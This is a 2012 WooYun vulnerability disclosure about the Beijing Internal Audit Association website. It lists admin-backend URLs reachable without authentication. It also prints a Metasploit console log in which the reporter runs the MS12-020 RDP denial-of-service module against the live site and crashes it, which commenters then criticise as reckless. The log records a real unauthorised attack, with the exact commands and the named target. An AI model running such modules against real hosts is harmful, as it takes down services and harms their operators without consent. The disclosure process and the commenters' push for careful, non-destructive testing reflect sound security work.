当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08500

漏洞标题:北京市内审协会某后台未授权访问+远程桌面协议RDP拒绝访问漏洞(MS12-020)

相关厂商:北京市内审协会

漏洞作者: zhk

提交时间:2012-06-19 17:55

修复时间:2012-08-03 17:56

公开时间:2012-08-03 17:56

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-19: 细节已通知厂商并且等待厂商处理中
2012-06-20: 厂商已经确认,细节仅向厂商公开
2012-06-30: 细节向核心白帽子及相关领域专家公开
2012-07-10: 细节向普通白帽子公开
2012-07-20: 细节向实习白帽子公开
2012-08-03: 细节向公众公开

简要描述:

北京市内审协会某后台未授权访问

详细说明:

http://www.bjia.org/bjiaportal/
http://www.bjia.org/bjiaportal/wafplatform/portletmanage.do
http://www.bjia.org/bjiaportal/wafplatform/portletmanage.do?funcid=showGroupTree
远程桌面协议RDP拒绝访问漏洞(MS12-020)

漏洞证明:


msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set rhost www.bjia.org
rhost => www.bjia.org
msf auxiliary(ms12_020_maxchannelids) > exploit
[*] www.bjia.org:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] www.bjia.org:3389 - 210 bytes sent
[*] www.bjia.org:3389 - Checking RDP status...
[+] www.bjia.org:3389 seems down //不是好像,而是一定挂了
[*] Auxiliary module execution completed

修复方案:

加验证,打补丁

版权声明:转载请注明来源 zhk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2012-06-20 09:19

厂商回复:

CNVD确认漏洞并复现部分情况,已转由CNCERT国家中心协调北京市信息化主管部门处置。
对该漏洞评分如下:
CVSS:(AV:R/AC:L/Au:NR/C:N/A:C/I:P/B:N) score:8.47(最高10分,高危)
即:远程攻击、攻击难度低、不需要用户认证,对可用性构成完全影响,对完整性构成部分影响。
技术难度系数:1.1(多个漏洞)
影响危害系数:1.2(一般,涉及行业协会网站,存在运行安全风险)
CNVD综合评分:8.47*1.1*1.2=11.180

最新状态:

暂无


漏洞评价:

评论

  1. 2012-06-19 18:00 | 天行健 ( 路人 | Rank:20 漏洞数:3 | 业余信息安全爱好者,没事了玩一玩)

    网站打不开,@zhk 你把人家的服务器给重启了么?MS12-020现有的利用工具貌似只能蓝屏重启吧

  2. 2012-06-19 18:07 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    @天行健 所以叫‘拒绝访问’

  3. 2012-06-19 18:16 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @zhk 危险啊,亲

  4. 2012-06-19 18:18 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    @xsser 不用直接发利用代码好像检测不出来不是吗?

  5. 2012-06-19 18:20 | 天行健 ( 路人 | Rank:20 漏洞数:3 | 业余信息安全爱好者,没事了玩一玩)

    @zhk 亲,你搞了就搞了,现在你发出来,坐实了就是你干的.....亲,改天去局子里给你送饭好了....

  6. 2012-06-19 18:58 | Moments ( 实习白帽子 | Rank:55 漏洞数:10 | 2)

    这可不能瞎玩,你要知道政府的服务器都不重启的,你这一下蓝屏,回头重启 起不来,造成什么通报批评之类的 全是你责任啊 年轻人

  7. 2012-06-19 19:20 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    看来以后需谨慎呐

  8. 2012-06-19 19:44 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    兄,走好不送

  9. 2012-06-19 19:53 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    这个网站好像没人管,到现在还没启动

  10. 2012-06-19 22:07 | cncert国家互联网应急中心(乌云厂商)

    哥,确实是不动了。。要不晚上给你确认了吧。

  11. 2012-06-19 22:08 | code0day ( 实习白帽子 | Rank:45 漏洞数:4 | 一步一步来。)

    你完蛋了。。政府也敢重启

  12. 2012-06-19 22:09 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    @cncert国家互联网应急中心 管理员看来罢工了

  13. 2012-06-20 00:46 | Say ( 路人 | Rank:17 漏洞数:4 | 谁又会鉴定谁正常?)

    这真是悲剧。。。

  14. 2012-06-20 01:50 | Z-0ne 认证白帽子 ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)

    @cncert国家互联网应急中心 @xsser 这个缺陷正好再次提醒了我们对漏洞测试时的尺度问题以及在复现的方式和方法上都应该更加谨慎,如果在明知可能引发宕机后果的情况下进行测试是非常不明智的行为。

  15. 2012-06-20 02:02 | Z-0ne 认证白帽子 ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)

    @zhk 安全宝好像有这个功能(http://lucky.anquanbao.com/),至于准确率可自行测试

  16. 2012-06-20 02:27 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    @Z-0ne 谢谢啦

  17. 2012-06-20 12:09 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    MS12-020确实是有不蓝屏检测工具的,其检测方法比较巧妙,“通过安全扫描CVE-2012-0152来判断CVE-2012-0002 rdp漏洞的存在,这样可以防止扫描rdp漏洞导致蓝屏的发生”(来源:@vessial )。检测代码:(1)http://hi.baidu.com/vessial/blog/item/c5f6a0f347fd344f342accf5.html ;(2)http://pastebin.com/1prnaCmd

  18. 2012-06-20 12:53 | 天行健 ( 路人 | Rank:20 漏洞数:3 | 业余信息安全爱好者,没事了玩一玩)

    @horseluke 检测都是Cannot check不论本机,远程,打补丁,没打补丁都这个提示

  19. 2012-07-10 09:50 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @天行健 可以尝试注释出现can not check的代码试试